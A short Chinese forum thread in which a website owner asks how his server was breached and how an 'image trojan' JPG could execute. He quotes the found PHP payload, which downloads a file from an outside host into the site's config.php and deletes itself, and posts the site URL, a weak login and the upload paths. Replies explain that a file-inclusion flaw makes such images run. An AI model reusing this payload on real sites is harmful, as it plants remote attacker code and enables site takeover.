http://w.mwovo1.cn/ 账号密码 123 123
图片马内容<?php file_put_contents('./Addons/Attachment/config.php',file_get_contents('http://www.hhgyrt.space/pic.txt'));unlink('test1.php')?>
由于我服务器搬家了,日志没有了,现在没办法查看日志,怎么能找出漏洞在哪,还有图片马不是需要找到解析漏洞才行吗,jpg他怎么直接执行?
[招生]系统0day安全班,企业级设备固件漏洞挖掘,Linux平台漏洞挖掘!
http://w.mwovo1.cn//Public/static/ueditor/php/upload/7891592914555.jpg
1791592203212.JPG23861591427140.JPG 这三个都是图片马一样的
图片马怎么实现的?
敏而好学 图片马怎么实现的?
wx_三五瓶 图片不是需要解析漏洞才行吗
Lauv 文件包含就执行了
他的意思应该是说,如果有文件包含漏洞,可以包含这个1791592203212.JPG这个图片,那么不管被包含的文件后缀名是什么,文件中的内容都会被执行。
所以说应该是建议楼主查一查有没有文件包含漏洞。
另外,楼主的日志没了,这个比较难搞了。。